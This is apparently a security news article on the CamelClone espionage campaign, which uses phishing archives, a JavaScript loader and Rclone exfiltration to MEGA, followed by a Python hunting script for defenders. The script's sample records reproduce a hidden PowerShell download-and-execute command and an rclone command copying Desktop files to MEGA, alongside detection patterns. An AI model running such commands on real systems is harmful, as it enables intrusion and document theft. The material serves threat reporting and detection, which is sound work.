CamelClone spy campaign abuses public file-sharing sites and Rclone in government-focused attacks
A newly documented espionage campaign called Operation CamelClone is targeting government, defense, diplomatic, and strategic-sector entities across Algeria, Mongolia, Ukraine, and Kuwait. Seqrite says the attackers use spear-phishing ZIP files disguised as official government correspondence, then rely on public file-sharing sites and the legitimate tool Rclone to steal documents and Telegram session data without using a traditional command-and-control server.
What makes the operation stand out is its infrastructure model. Instead of building dedicated attacker-controlled servers, the operators host payloads on the public file-sharing site filebulldogs[.]com and move stolen files to MEGA cloud storage. That approach helps the traffic blend into ordinary internet activity and makes network-based detection harder.
Seqrite says the campaign first surfaced in late February 2026, when a suspicious ZIP file themed around Algeria’s Ministry of Housing appeared on VirusTotal. The researchers later found additional samples using Mongolia, Algeria-Ukraine cooperation, and Kuwait Air Force themed lures, which pointed to a broader intelligence-focused operation rather than an isolated phishing run.
How the CamelClone attack works
Each observed archive contained a malicious Windows shortcut file and a decoy image or document designed to look official. Seqrite says that when the victim opens the shortcut, a hidden PowerShell command runs silently, switches to the Temp directory, downloads a JavaScript file named f.js from filebulldogs[.]com, saves it locally, and executes it to continue the infection chain.
Seqrite tracks that JavaScript loader as HOPPINGANT. The file runs under Windows Script Host and launches two Base64-encoded PowerShell commands. Those commands download a decoy PDF to distract the victim, then fetch another archive named a.zip, which contains a portable copy of Rclone version 1.70.3.
After extracting Rclone, the script rebuilds a password with a simple XOR routine using the key value 56, then uses those credentials to authenticate to a MEGA account registered with an onionmail.org address. Seqrite says the malware then collects .doc, .docx, .pdf, and .txt files from the Desktop and also tries to exfiltrate Telegram Desktop session data from the tdata directory.
Why researchers see this as espionage, not routine cybercrime
Seqrite says the targeting pattern points toward intelligence collection. The victims and lure themes focused on government bodies, defense procurement, foreign affairs, diplomatic cooperation, and strategic energy-linked environments. The company says that choice of targets, plus the geopolitical themes in the decoy files, aligns more closely with spying goals than with financially motivated cybercrime.
The campaign also shows discipline in how it separates its operations. Seqrite observed the same file-sharing domain across all four campaigns, but with different upload paths such as /uploads/AVQB61TVOX/, /uploads/OKW5RN48ZJ/, and /uploads/F1OQY9GU84/. The researchers believe that separation helps the attackers run multiple parallel campaigns while reducing the chance that one takedown removes every payload at once.
Key details at a glance
| Item | Detail |
|---|---|
| Campaign name | Operation CamelClone |
| Main targets | Government, defense, diplomatic, and strategic sectors |
| Countries named by Seqrite | Algeria, Mongolia, Ukraine, Kuwait |
| Initial delivery | Spear-phishing ZIP archive with malicious LNK |
| Loader | HOPPINGANT JavaScript |
| Payload abuse | Rclone v1.70.3 used for exfiltration |
| Payload hosting | filebulldogs[.]com |
| Exfiltration destination | MEGA accounts tied to onionmail.org emails |
What makes CamelClone harder to detect
The campaign avoids the classic model of malware talking to a visible C2 server. Instead, it abuses public services that defenders often allow or treat as low-priority traffic. Seqrite says this model makes pure network detection less effective because the activity looks closer to standard web downloads and cloud storage use.
The attackers also reused key technical patterns across the campaigns. Seqrite says the same XOR key, the same HOPPINGANT loader family, and the same Rclone settings appeared in the different samples. Those overlaps strongly suggest a coordinated operation rather than unrelated attacks borrowing similar lures.
What organizations should do
- Treat unsolicited ZIP files that reference ministries, defense deals, or diplomatic cooperation as high risk.
- Restrict or monitor LNK execution from untrusted sources.
- Watch for PowerShell launching JavaScript or downloading files into Temp paths.
- Monitor outbound traffic to anonymous file-sharing sites and cloud storage services such as MEGA.
- Hunt for suspicious use of Rclone on systems where it should not normally appear, since Seqrite documents Rclone as the campaign's exfiltration tool.
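As an added example (not Seqrite's or the page's own tooling), the following Python script applies the hunting guidance above to constructed process-creation records; the telemetry shape, host names and paths are assumptions, while the behaviours it keys on (PowerShell downloading into Temp, a .js run by Windows Script Host from Temp, Rclone started from a user-writable path, by a script host, or toward a MEGA remote) come from the report.

```python
"""Hunt for the CamelClone execution chain in process-creation telemetry."""
import re
from collections import defaultdict

# Constructed sample records shaped like Sysmon Event ID 1 / EDR process
# creation: (host, parent_image, image, command_line). WS01 replays the chain
# Seqrite describes (domain kept defanged); WS02 is benign admin use of Rclone.
EVENTS = [
    ("WS01", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -w hidden -c cd $env:TEMP; iwr http://filebulldogs[.]com/uploads/AVQB61TVOX/f.js -OutFile f.js; wscript f.js"),
    ("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\System32\wscript.exe", r"wscript C:\Users\u\AppData\Local\Temp\f.js"),
    ("WS01", r"C:\Windows\System32\wscript.exe",
     r"C:\Users\u\AppData\Local\Temp\rclone-v1.70.3-windows-amd64\rclone.exe",
     r"rclone.exe copy C:\Users\u\Desktop mega:docs --include *.docx"),
    ("WS02", r"C:\Windows\explorer.exe", r"C:\Program Files\rclone\rclone.exe",
     r"rclone.exe sync D:\backups gdrive:backups"),
]

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_powershell_download_to_temp(parent, image, cmd):
    # PowerShell fetching content while working in a Temp path.
    return (_base(image) == "powershell.exe"
            and re.search(r"\\temp\b|\$env:temp", cmd, re.I) is not None
            and re.search(r"\b(iwr|invoke-webrequest|downloadfile|curl|wget)\b", cmd, re.I) is not None)

def rule_script_host_js_from_temp(parent, image, cmd):
    # Windows Script Host executing a .js dropped in Temp, spawned by PowerShell.
    return (_base(image) in ("wscript.exe", "cscript.exe")
            and re.search(r"\\temp\\\S+\.js\b", cmd, re.I) is not None
            and _base(parent) == "powershell.exe")

def rule_rclone_unexpected(parent, image, cmd):
    # Rclone from a user-writable path, under a script host, or aimed at MEGA.
    if _base(image) != "rclone.exe":
        return False
    return (re.search(r"\\(temp|appdata|downloads)\\", image, re.I) is not None
            or _base(parent) in ("wscript.exe", "cscript.exe", "powershell.exe")
            or re.search(r"\bmega\b", cmd, re.I) is not None)

RULES = {"powershell_download_to_temp": rule_powershell_download_to_temp,
         "script_host_js_from_temp": rule_script_host_js_from_temp,
         "rclone_unexpected": rule_rclone_unexpected}

def hunt(events):
    """Return {host: sorted rule names} for every host with at least one hit."""
    hits = defaultdict(set)
    for host, parent, image, cmd in events:
        hits[host].update(n for n, r in RULES.items() if r(parent, image, cmd))
    return {h: sorted(r) for h, r in hits.items() if r}

def chain_hosts(events, min_stages=2):
    """Hosts where several stages fired: far stronger than any single hit."""
    return sorted(h for h, r in hunt(events).items() if len(r) >= min_stages)
```

Treat a single rule hit as a lead for triage and a multi-stage host as an incident; the Rclone rule alone will also surface legitimate but unapproved use worth reviewing.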
FAQ
What is Operation CamelClone?
It is a multi-region espionage campaign that Seqrite says targeted government, defense, diplomatic, and strategic-sector entities using spear-phishing archives and a file-sharing based infection chain.
Where does the campaign host its payloads and send stolen data?
Seqrite says the attackers host payloads on filebulldogs[.]com and upload stolen data to MEGA, rather than relying on dedicated attacker servers.
Why is the exfiltration hard to spot?
Because the attackers use the legitimate Rclone tool to transfer stolen files to MEGA, which helps the exfiltration blend in with normal cloud activity.
What data does CamelClone steal?
Seqrite says the campaign targets documents on the Desktop, including Word files, PDFs, text files, and Telegram Desktop session data.